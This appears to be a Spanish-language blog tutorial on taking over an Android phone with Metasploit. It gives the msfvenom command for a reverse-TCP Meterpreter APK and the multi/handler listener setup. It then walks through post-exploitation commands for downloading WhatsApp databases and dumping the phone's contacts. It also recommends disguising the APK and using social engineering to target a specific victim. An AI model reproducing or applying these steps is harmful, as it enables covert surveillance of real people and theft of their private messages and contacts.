Utilizando Metasploit para vulnerar un sistema Android



Lo primero que debemos saber es que metasploit es una herramienta enfocada directamente al pentesting, esta herramienta posee una amplia variedad de "exploits" que son basicamente scripts que explotan directamente una vulnerabilidad en un sistema operativo, ademos contamos con varios auxiliares, payloads, encoders y herramientas post explotacion, que haran posible una infiltracion completamente exitosa y sigilosa dentro del equipo victima.

Metasploit esta disponible para linux, windows, y mac. si bien es posible instalarlo en windows, yo por cuestiones de facilidad y de gusto usare una distro de linux enfocada directamente en este tipo de aplicaciones, como lo es Kali Linux, ya esta distro viene con todo lo necesario para iniciar el metasploit y todas sus funciones, ademas de multiples herramientas mas(mas de 100 aprox).

Ahora antes de comenzar debemos tener en cuenta de que kali linux es un sistema operativo derivado de debian y con un kernel modificado para poder sacarle el maximo potencial a todas las herramientas de explotacion que trae preinstaladas por lo que antes de comenzar a utilizar metasploit debemos actualizar los repositorios de kali para evitar cualquier tipo de problemas.

Yo recomiendo no usar el kali como sistema operativo principal, recomiendo intalarlo en una particion secundaria, o bootearlo desde una usb, teniendo esto en cuenta podemos comenzar.

Lo primero es iniciar la base de datos de metasploit con el siguiente comando en la terminal:

sudo service postgresql start

Una vez iniciada usamos el siguiente comando para lanzar la base de datos:

sudo msfdb init

Ahora si vamos a iniciar el metasploit directamente desde una terminal con el comando

sudo msfconsole

Ya con esto el metasploit esta abierto, ahora podemos comenzar a usar los comandos como:

sysinfo: Muestra informacion del OS del equipo victima
donwload: Descarga cualquier archivo del equipo victima al equipo atacante( este debe ir seguido de la ruta del archivo a descargar)
ls: Lista los directorios de las carpetas 
cd: Permite moverse por los directorios del equipo victima
screnshot: Permite tomar una captura de la pantalla en tiempo real para saber que haciendo el equipo victima

Ya con esto en cuenta podemos empezar crear nuestra apk maliciosa, para eso utilizaremos el comando:

msfvenom -p android/meterpreter/reverse_tcp lhost=(su direccion ip) lport=(un puerto cualquiera de su red) R > (nombre.apk)



Como se ve en la consola del lado derecho de la pantalla, con este comando lo que hacemos es indicarle el exploit a utilizar, junto a la ip y el puerto a donde se va a conectar. Una vez creada la apk maliciosa tendremos que instalarla en el dispositivo(existen muchas maneras de camuflar la apk con otra aplicacion o de hacer que se instale remotamente en el dispositivo) para este ejempo la instalare manualmente en mi tablet como una aplicacion mas.

NOTA:

android/meterpreter/reverse_tcp: con esto le estamos indicando que el tipo de conexion sera reversa y que debe enviar la carga util a la ip y port indicados en la linea de comandos.

Ahora usamos el comando clear par alimpiar la terminal o abrimos otro terminal(en caso de abrir otra terminal deben iniciar el metasploit de nuevo) y vamos a indicarle a metasploit que puerto va a escuchar para recibir la informacion

use multi/handler

con este le hacemos saber a metasploit que vamos a usar el mismo exploit en la consola

Ahora debemos indicarle el exploit que se utilizo para la apk con la siguiente linea:

set PAYLOAD android/meterpreter/reverse_tcp

y con las siguientes lineas indicaremos la ip y el puerto que va a usar:

set LHOST (su ip)
set LPORT (el puerto)

NOTA: la ip usada en la apk debe ser la misma de su pc, y el puerto puede ser cualquiera en la apk aqui deben utilizar exacmaente la misma ip y el puerto que usaron para la apk.

ahora con la siguiente linea el metasploit se pone a la escucha:

exploit

Ya con esto solo se debe abrir la apk en el dispositivo infectado y la conexion estar completa, con lo que tendremos el control del mismo

En este punto ya podemos hacer uso de los diferentes comandos que nos ofrece metasploit y hacer lo que queramos en el dispositivo, es muy importante que tengas en cuenta que debes tener conocimiento basico sobre el funcionamiento de la memoria de andorid para poder encontrar los directorios y archivos mediante "cd" y "ls".

A continuacion les dejo las capturas de lo que se puede llegar a hacer:

Aqui vemos el uso de los comandos "sysinfo" para saber que version de android tiene el dispositivo y "check_root" para saber si esta rooteado el dispositivo


Aqui nos movemos entre los directorios para buscar la base de datos de whatsapp



Una vez descargadas las guarda en el directorio raiz, cabe destacar que estas obviamente estan encriptadas, para desencriptarlas deben usar otras aplicaciones



El comando "dump_contacs" nos crea un archivo de volcado en formato txt con todos los contactos del dispositivo



Como ven esta es una de las muchas maneras que hay de vulnerar un sistema android, una cosa a tener en cuenta para este tipo de ataque es el como hacer llegar la backdoor al dispositivo android que ya es cuestion de documentarse un poco mas y hacer un poco de ingenieria social para conocer a tu victima y preparar el ataque desde 0 en funcion a esa persona, cada apk debe ser personalizada para cada ataque para aumentar el exito del mismo.

Si quieren que haga un tutorial mas robusto de las funciones de metasploit y como podemos muchos mas exploit y otros tipos de ataques haganme saber a travez de los comentarios.

Comentarios

Entradas populares de este blog

Freebitcoin

Icloud Bypass

Coinpot